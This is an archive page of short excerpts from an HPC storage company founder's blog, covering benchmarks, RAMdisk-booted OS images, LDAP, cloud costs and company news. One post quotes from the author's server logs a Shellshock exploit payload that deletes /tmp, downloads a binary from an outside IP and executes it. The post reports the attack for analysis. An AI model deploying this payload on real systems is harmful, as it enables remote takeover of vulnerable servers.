See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
started playing with SmartOS for the day job
This is a very cool concept, something that meshes perfectly with our Tiburon based siCluster philosophy. That is, compute nodes should boot diskless, there should be very little state on each node, and stuff that you need to do should be made absolutely as simple as possible. SmartOS is a project of Joyent. Joyent, for those not familiar with them, are a cloud company, building a nice public cloud for end users to build on.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Category: clouds
Posts
#HPC in all the things
I read this announcement this morning. Our friends at Facebook releasing their reduced precision server side convolution and GEMM operations.
Many years ago, I tried to convince people that HPC moves both down market, into lower cost hardware, as well as more widely into more software toolchains. Basically, the decades of experience building very high performance applications and systems will have value downstream for many users over time.
GEMM is a generalized approach to a matrix multiply, which has been well optimized for HPC applications in various scientific libraries over time.
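For anyone who hasn't met it, the operation behind the name is the BLAS-style general matrix multiply, C ← αAB + βC. Below is a deliberately naive pure-Python sketch of that definition. It has nothing to do with Facebook's reduced precision implementation, and the function name and list-of-rows layout are my own choices for illustration; real libraries get their speed from blocking, vectorization, and careful use of the memory hierarchy.

```python
def gemm(alpha, a, b, beta, c):
    """Return alpha * (a @ b) + beta * c for matrices stored as lists of rows."""
    m, k, n = len(a), len(b), len(b[0])
    if any(len(row) != k for row in a):
        raise ValueError("inner dimensions of a and b do not match")
    if len(c) != m or any(len(row) != n for row in c):
        raise ValueError("c must have shape (rows of a) x (columns of b)")

    # Start from beta * c, then accumulate alpha * a @ b into it.
    result = [[beta * c[i][j] for j in range(n)] for i in range(m)]
    for i in range(m):
        for p in range(k):
            scaled = alpha * a[i][p]
            for j in range(n):
                result[i][j] += scaled * b[p][j]
    return result


a = [[1, 2], [3, 4]]
b = [[5, 6], [7, 8]]
c = [[1, 1], [1, 1]]
out = gemm(2, a, b, 3, c)
print(out)  # [[41, 47], [89, 103]]
```

The triple loop is the whole algorithm; decades of HPC work on GEMM is about executing those same multiply-adds in an order the hardware likes.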
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from statically linking programs to more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. Flocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And it’s very hard to outcompete something like k8s.
Posts
A good read on realities behind cloud computing
In this article on the venerable Next Platform site, Addison Snell makes a case against some of the presumed truths of cloud computing. One of the points he makes is specifically something we run into all the time with customers, and yet this particular untruth isn’t really being reported the way our customers look at it. Sure, you are paying for the unused capacity. This is how utility models work. Tenancy is the most important measure to the business providing the systems.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
Raw Unapologetic Firepower: kdb+ from @Kx
While the day job builds (hyperconverged) appliances for big data analytics and storage, our partners build the tools that enable users to work easily with astounding quantities of data, and do so very rapidly, and without a great deal of code. I’ve always been amazed at the raw power in this tool. Think of a concise functional/vector language, coupled tightly to a SQL database. It’s not quite an exact description, have a look at Kx’s website for a more accurate one.
Posts
new SIOS feature: compressed ram image for OS
Most people use squashfs which creates a read-only (immutable) boot environment. Nothing wrong with this, but this forces you to have an overlay file system if you want to write. Which complicates things … not to mention when you overwrite too much, and run out of available inodes on the overlayfs. Then your file system becomes “invalid” and Bad-Things-Happen(™). At the day job, we try to run as many of our systems out of ram disks as we can.
Posts
It is 2016 ... why am I fighting with LDAP authentication in linux? Why doesn't it just work?
Ok … very long story that boils down to us trying to help a customer out. I am trying to avoid the “let’s just add another user to /etc/passwd” or similar such thing. And they aren’t quite ready to hook into AD or similar. So we have this issue. I want to enable their nodes to use ldap. I’ve done this before for other customers with older tools (pam_ldap, etc.). But it was somewhat crazy (as in non-trivial), involving gnashing of teeth, gums, etc.
Posts
Not even breaking a sweat: 10GB/s write to single node Forte unit over 100Gb net #realhyperconverged #HPC #storage
TL;DR version: 10GB/s write, 10GB/s read in a single 2U unit over 100Gb network to a backing file system. This is tremendous. The system and clients are using our default tuning/config. Real hyperconvergence requires hardware that can move bits to/from storage/networking very quickly. This is that. These units are available. Now. In volume. And are very reasonably priced (starting at $1USD/GB). Contact us for more details. This is with a file system …
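To put the headline number in context, here is the back-of-the-envelope arithmetic as a small sketch. The two figures come straight from the text above; the rest is my assumption: decimal units (1 GB = 10^9 bytes, 1 Gb = 10^9 bits), 8 bits per byte, and no allowance for protocol or encoding overhead on the wire.

```python
LINK_GBIT_PER_S = 100       # from the post: 100Gb network
MEASURED_GBYTE_PER_S = 10   # from the post: 10GB/s write and read


def line_rate_gbyte_per_s(link_gbit_per_s):
    """Raw link capacity in GB/s, ignoring protocol overhead (assumption)."""
    return link_gbit_per_s / 8


def utilization(measured_gbyte_per_s, link_gbit_per_s):
    """Fraction of the raw line rate that the measured throughput represents."""
    return measured_gbyte_per_s / line_rate_gbyte_per_s(link_gbit_per_s)


ceiling = line_rate_gbyte_per_s(LINK_GBIT_PER_S)
used = utilization(MEASURED_GBYTE_PER_S, LINK_GBIT_PER_S)

print(f"raw line rate: {ceiling} GB/s")      # 12.5 GB/s
print(f"utilization:   {used:.0%}")          # 80%
```

So 10GB/s through a file system is roughly 80% of what the wire could carry in the ideal case, before any overhead is subtracted.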
Posts
Massive unapologetic storage firepower part 4: On the test track with a Forte unit ... vaaaaROOOOOOMMMMMMM!!!!!
I am trying to help people conceptualize the experience. Here is a video depicting very fast, very powerful cars and their sound signatures.
This is a good start. Take one of those awesome machines, and turn off half the engine. So it is literally running with 1/2 of its power turned off. Remember this. There will be a quiz. As we flippantly noted in the video, this is face-melting performance. Had I any hair left, it would have been blown way back.
Posts
"Unexpected" cloud storage retrieval charges, or "RTFM"
An article appeared on HN this morning. In it, the author noted that all was not well with the universe, as their backup, using Amazon’s Glacier product, wound up being quite expensive for a small backup/restore. The OP discovered some of the issues with Glacier when they began the restore (not commenting on performance, merely the costing). Basically, to lure you in, they provide very low up front costs. That is, until you try to pull the data back for some reason.
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com. You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on Hacker News to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison)
* 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system
* 100Gb connection to a partner/customer booth
* Forte

100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
On storage unicorns and their likely survival or implosion
The Register has a great article on storage unicorns. Unicorns are not necessarily mythical creatures in this context, but very high valuation companies that appear to defy “standard” valuation norms, and hold onto their private status longer than those in the past. That is, they aren’t in a rush to IPO or get acquired.
The article goes on to analyze the “storage” unicorns, those in the “storage” field. They admix storage, nosql, hyperconverged, and storage as a service.
Posts
Gmail lossy email system
For months I’ve been noting that email to my 2 different GMail accounts (one for work on the business side using the Google Apps for business, and yes, paid for … and one for personal) are not getting all the emails sent to them. I’ve had customers reach out to me here at this site, as well as calling me up to ask me if I’ve been getting their email. Seems I’m not the only one, though the complaint here appears to be a bad filter and characterizing system.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Amusing #fail
I use Mozilla’s Thunderbird mail client. For all its faults, it is still the best cross platform email system around. Apple’s mail client is a bad joke and only runs on Apple devices (go figure). Linux’s many offerings are open source, portable, and most don’t run well on my Mac laptop. I no longer use Windows apart from running in a VirtualBox environment. And I would never go back to Outlook anyway (used it once, 15 years ago or so … never again).
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:

* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty

As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with a newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics’ domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Comcast disabled port 25 mail on our business account
We have a business account at home. I work enough from home that I can easily justify it. Fixed IP, and I run services, mostly to back up my office services. One of those services is SMTP. I’ve been running an SMTP server, complete with antispam/antivirus/… for years. Handles backup for some domains, but is also primary for this site. This is allowable on business accounts. Or it was allowable. 3 days ago, they seem to have turned that off.
Posts
Massive, unapologetic, firepower: 2TB write in 73 seconds
A 1.2PB single mount point Scalable Informatics Unison system, running an MPI job (io-bm) that just dumps data as fast as the little Infiniband FDR network will allow. Our test case. Write 2TB (2x overall system memory) to disk, across 48 procs. No SSDs in the primary storage. This is just spinning rust, in a single rack. This is performance pr0n, though safe for work.
usn-01:/mnt/fhgfs/test # df -H /mnt/fhgfs/
Filesystem Size Used Avail Use% Mounted on
fhgfs_nodev 1.
Posts
Doing what we are passionate about
I am lucky. I fully admit this. There are people out there who will tell you that it’s pure skill that they have been in business and been successful for a long time. Others will admit luck is part of it, but will again, pat themselves on the back for their intestinal fortitude. Few will say “I am lucky”. Which is a shame, as luck, timing (which you can never really, truly, control), and any number of other factors really are critical to one being able to have the luxury of doing what we are doing.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Calxeda restructures
The day job had been talking to and working with Calxeda for a while. They’ve been undergoing some changes over the last few months as they worked to transition from an evangelist to a systems builder. The day job just got a note that they are restructuring. What this specifically means to an outsider, I am not sure, though I could speculate. HP has a vested interest in them. I wouldn’t be surprised to see a rapid asset acquisition.
Posts
Day job at HPC on Wall Street on Monday the 9th
We’ll be showing off 2 appliances, with a change of what we are showing/announcing on one due to something not being ready on the business side. The first one is our little 108 port siRouter box. Think ‘bloody fast NAT’ and SDN in general, you can run other virtual/bare metal apps atop it.
The second will be a massive scale parallel SQL DB appliance. Usable for big data, hadoop like workloads, and other similar workloads more commonly used on other well known platforms.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Category: clusters
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
Fully RAMdisk booted CentOS 7.2 based SIOS image for #HPC , #bigdata , #storage etc.
This is something we’ve been working on for a while … a completely clean, as baseline a distro as possible, version of our SIOS RAMdisk image using CentOS (and by extension, Red Hat … just need to point to those repositories). And it’s available to pull down and use as you wish from our download site. Ok, so what does it do? Simple. It boots an entire OS, into RAM. No disks to manage and worry over.
Posts
OpenLDAP + sssd ... the simple guide
Ok. Here’s the problem. Small environment for customers, who are not really sure what they want and need for authentication. Yes, they asked us to use local users for the machines. No, the number of users was not small. AD may or may not be in the picture. Ok, I am combining two sets of users with common problems here. In one case, they wanted manual installation of many users onto machines without permanent config files.
Posts
Been there, done that, even have a patent on it
I just saw this about doing a divide and conquer approach to massive scale genomics calculation. While not specific to the code in question, it looked familiar. Yeah, I think I’ve seen something like this before … and wrote the code to do it. It was called SGI GenomeCluster. It was original and innovative at the time, hiding the massively parallel nature of the computation behind a comfortable interface that end users already knew.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Inventory reduction @scalableinfo
It’s that time of year, when the inventory fairies come out and begin their counting. Math isn’t hard, but the day job would like a faster and easier count this year. So, the day job is working on selling off existing inventory. We have 4 units ready to go out the door to anyone in need of 70-144TB usable storage at 5-6 GB/s per unit. Specs are as follows:
* 16-24 processor cores
* 128 GB RAM
* 48x {2,3,4} TB top mount drives
* 4x rear mount SSDs (OS/metadata cache)
* Scalable OS (Debian Wheezy based Linux OS)
* 3 year warranty
As this is inventory reduction, the more inventory you take, the happier we are (and the less work that the inventory fairies have to do).
Posts
30TB flash disk, Parallel File System, massive network connectivity
This will be fun to watch run …
Scalable Informatics FastPath Unison for the win!
Posts
massive unapologetic firepower part 2 ... the dashboard ...
For Scalable Informatics Unison product. The whole system:
[ ](/images/dash-2.png)
Watching writes go by:
[ ](/images/dash-3.png)
Note the sustained 40+ GB/s. This is a single rack sinking this data, and no SSDs in the bulk data storage path. This dashboard is part of the day job’s FastPath product.
Posts
Updated boot tech in Scalable OS (SIOS)
This has been an itch we’ve been working on scratching a few different ways, and it’s very much related to forgoing distro based installers. Ok, first the back story. One of the things that has always annoyed me about installing systems has been the fundamental fragility of the OS drive. It doesn’t matter if it’s RAIDed in hardware/software. It’s a pathway that can fail. And when it fails, all hell breaks loose.
Posts
Update on IPMI Console Logger
Config now comes from some nice and simple json, and it handles multiple machines with aplomb. See the git repository for the latest. The config file example is in there, and you can replicate the n01-ipmi section with more nodes trivially. Coming next is getting config from a trusted web server, along with registering the client to the trusted web server. This prevents things like passwords from showing up in the clear, though you can always create a lower privileged user to access the console for monitoring.
Posts
... and the positions are now, finally open ...
See the Systems Engineering position here, and the System Build Technician position here. I’ll get these up on the InsideHPC.com site and a few others soon (tomorrow). But they are open now. For the Systems Engineering position, we really need someone in NYC area with a strong financial services background … Doug made me take out the “able to leap tall buildings in a single bound” line, as well as the “must be able to talk customers through complex vi sessions on system configuration files while driving 70 mph on a highway.
Posts
Massive. Unapologetic. Firepower. 24GB/s from siFlash
Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio
...
Run status group 0 (all jobs):
READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec
This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
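The arithmetic behind those last two sentences can be checked with a few lines of Python. This is only a sketch: the function names are made up for illustration, and it assumes 1TB = 1,000,000 MB and 1PB = 1,000,000,000 MB, treating fio's "MB" loosely.

```python
def throughput_mb_per_s(io_mb, elapsed_ms):
    """Aggregate bandwidth from total I/O (MB) and elapsed time (ms)."""
    return io_mb / (elapsed_ms / 1000.0)


def seconds_to_read(total_mb, rate_mb_per_s):
    """Time needed to read total_mb at a sustained rate."""
    return total_mb / rate_mb_per_s


# Figures taken from the fio summary line above.
rate = throughput_mb_per_s(786432, 32808)

# Assumed unit conversions: 1 TB = 1e6 MB, 1 PB = 1e9 MB.
one_tb_seconds = seconds_to_read(1_000_000, rate)
one_pb_hours = seconds_to_read(1_000_000_000, rate) / 3600

print(f"rate: {rate:.0f} MB/s")
print(f"1 TB: {one_tb_seconds:.1f} s")
print(f"1 PB: {one_pb_hours:.1f} h")
```

Under those assumptions the numbers come out at roughly 42 seconds per TB and a bit under 12 hours per PB, in line with the "40 seconds or so" and "1/2 a day" quoted above.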
Posts
We built that: 10 years in business
[warning: longer post] I mentioned this on twitter (@sijoe). The day job has been in business for 10 years. We’ve not taken outside investment to date, and we’ve not sold the company yet. We’ve been profitable and growing continuously during our lifetime. The preceding 3 years have seen growth, accelerating hard. The company was built starting with a conviction that practitioners and users of HPC systems needed better designs, better systems than were being pushed out by traditional vendors in the early 2000’s.
Posts
Day job PR: JRTI and Scalable Informatics Form Strategic Partnership
Will be up on the day job site tomorrow. We are very excited by these developments, and look forward to a productive relationship.
JRTI and Scalable Informatics Form Strategic Partnership to Provide High Performance Storage and CPU & GPU Clusters to Organizations Seeking Exceptional Results Richmond, Virginia (January 18, 2011)-James River Technical, Inc (JRTI), specialists in accelerated and HPC solutions for the higher education, research, government, and commercial market segments, has entered into a reseller agreement with Scalable Informatics (Scalable) to provide Storage and HPC solutions throughout North America.
Posts
This is good news
Univa grabs GridEngine. Specifically:
Hat tip to Chris D for pointing it out. This directly addresses one of my major concerns on the longevity of GE. It also makes me feel a bit safer about using/deploying GE for users/customers. Specifically, if a committed and large/stable enough OSS project and/or committed company were to drive this, engage and work with the community to grow it, yeah … I am comfortable with this.
Posts
Auto industry? What auto industry?
Here in Detroit, we have the big 3 … Ford, GM, and Chrysler. Well, maybe no longer. This morning the government passed judgment on this industry, which had been requesting capital to survive, as the credit markets, despite protestations to the contrary from various sources, are still frozen … and they (and all other businesses) need capital (and credit) to survive. The government has said (basically) … it’s Chapter 11 (or 7) for you.
Posts
Guide to getting OFED 1.2 to build on OpenSuSE
Grab the tarball from the open fabrics alliance (or from here)
Grab the build_new.sh from here, place it in the OFED-1.2 directory
as root on your machine:
mv /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h.original
ln -s /usr/include/linux/miscdevice.h /usr/src/linux-2.6.18.2-34/include/linux/miscdevice.h
Then run the build_new.sh. Voila. Works. Binary RPMs are here.
Posts
HPC in the critical path
Is high performance computing a critical path technology? Is it a technology that you cannot do without? This is a question some potential partners were discussing this evening. Very interesting question. If HPC is not critical, then demand for it should be quite moderate. If it is not critical, then the market would have basically replacement level growth rates. If end users did not see a value in HPC, they wouldn’t use it, as their time would be spent elsewhere.
Posts
Is a cluster a toaster?
At the excellent Cluster Monkey Doug Eadline mused on a number of topics of interest, specifically on why Cluster HPC is hard. There were some excellent points made. The OSC is working on an initiative to increase access to high performance computing resources for end users. Their effort is in part by making access to HPC hardware easier, and in part by helping people (users and commercial entities) make better use of computational gear.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. One question I want to ask the good folks at Microsoft (Bill Gates is giving the opening keynote): what specifically is their HPC initiative supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Category: dadops
Posts
Three years
It’s been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. It’s an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “It’s code combat Dad.” she said, quite matter-of-factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Category: data-use-or-abuse
Posts
A wonderful read on metrics, profiling, benchmarking
Brendan Gregg’s writings are always interesting and informative. I just saw a link on hacker news to a presentation he gave on “Broken Performance Tools”. It is wonderful, and succinctly explains many things I’ve talked about here and elsewhere, but it goes far beyond what I’ve grumbled over. One of my favorite points in there is slide 83. “Most popular benchmarks are flawed” and a pointer to a paper (easy to google for).
Posts
Has Alibaba been compromised?
I saw this attack in the day job’s web server logs today. From IP address 198.11.176.82, which appears to point back to Alibaba. This doesn’t mean anything in and of itself, until we look at the payload.
()%20%7B%20:;%20%7D;%20/bin/bash%20-c%20/x22rm%20-rf%20/tmp/*;echo%20wget%20http://115.28.231.237:999/htrdps%20-O%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20echo%20By%20China.Z%20%3E%3E%20/tmp/Run.sh;echo%20chmod%20777%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20/tmp/China.Z-thpwx%20%3E%3E%20/tmp/Run.sh;echo%20rm%20-rf%20/tmp/Run.sh%20%3E%3E%20/tmp/Run.sh;chmod%20777%20/tmp/Run.sh;/tmp/Run.sh/x22
This appears to be an attempt to exploit a bash hole. What is interesting is the IP address to pull the second stage payload from. Run a whois against that … I’ll wait.
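The payload is percent-encoded, which makes it hard to read in a log. As a small sketch (decoding only, nothing is executed), Python's standard `urllib.parse.unquote` can turn the leading fragment back into plain text. The variable names here are just for illustration.

```python
from urllib.parse import unquote

# Leading fragment of the logged request, copied from the payload above.
fragment = "()%20%7B%20:;%20%7D;%20/bin/bash%20-c"

# unquote() only converts %XX escapes back to characters; it runs nothing.
decoded = unquote(fragment)
print(decoded)
```

The decoded prefix is an empty shell function definition followed by a command, which is the pattern associated with the 2014 bash "Shellshock" bug, so it is consistent with the reading above that this is an attempt to exploit a bash hole.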
Posts
Why doesn't linkedin make removing a contact easy?
I don’t get this. Yeah, sure, your contacts are curated, and I don’t accept everyone. I need to see some aspect of a connection and be pretty sure they won’t spam me personally or try to spam my contacts. So when I find out that this is what happens, I want to block their access to me. Which usually means un-connecting with them. So why does LinkedIn make this effectively impossible on the phone apps?
Posts
And the 0.8.3 InfluxDB no longer works with the InfluxDB perl module
I ran into this a few weeks ago, and am just getting around to debugging it now. Traced the code, set up a debugger and followed the path of execution, and … and … Yup, it’s borked. So, I can submit a patch or 3 against the InfluxDB code, or roll a simpler more general Time Series Data Base interface that will talk to InfluxDB. And eventually kdb+. Since I wanted to code for that as well, I am looking more seriously at the second option.
Posts
Solved the major socket bug ... and it was a layer 8 problem
I’d like to offer an excuse. But I can’t. It was one single missing newline. Just one. Missing. Newline. I changed my config file to use port 10000. I set up an nc listener on the remote host.
nc -k -l a.b.c.d 10000
Then I invoked the code. And the data showed up. Without a ()&(&%&$%*&(^ newline. That couldn’t possibly be it. Could it? No. It’s way too freaking simple.
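For anyone who has not been bitten by this: a receiver that reads line by line will sit and wait until it sees a newline. Here is a minimal sketch of the idea in Python, not the code from the post. It assumes the receiving end is line oriented; `frame_line` and `send_and_read_back` are hypothetical helper names, and the payload string is made up.

```python
import socket


def frame_line(payload: str) -> bytes:
    """Return payload as bytes, terminated by exactly one newline."""
    return payload.rstrip("\n").encode("utf-8") + b"\n"


def send_and_read_back(payload: str) -> bytes:
    """Send one framed line over a local socket pair and read it back."""
    # socketpair() gives two connected sockets in one process, standing in
    # for the sending code and the nc listener.
    sender, receiver = socket.socketpair()
    try:
        sender.sendall(frame_line(payload))
        with receiver.makefile("rb") as reader:
            # readline() returns only once the trailing newline arrives.
            return reader.readline()
    finally:
        sender.close()
        receiver.close()


print(send_and_read_back("hypothetical.metric 42 1400000000"))
```

Framing in one helper means every message gets its newline, whether or not the caller remembered it.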
Posts
InfluxDB cli is up on github
I know there is a node version, and I did try it before I wrote my own. Actually, the reason I wrote my own was that I tried it and … well … Link is here. And yes, the readme is borked about 1/2 way through. Doesn’t quite show the formatting of the output quite right. Will try to fix over the weekend, as I move this toward a far more feature complete state.
Category: devops
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and the “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk who might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
Architecture matters, and yes Virginia, there are no silver bullets for performance
Time and time again, the day job had been asked to discuss how the solutions are differentiated. Time and time again, we showed benchmarks on real workloads that show significant performance deltas. Not 2 or 3 sigma measurements. More often than not, 2x -> 10x better. Yet … yet … we were asked, again and again, how we did it. We pointed to our architecture. But, they complained, isn’t it the same as X (insert your favorite volume vendor here)?
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
strace -p is your friend
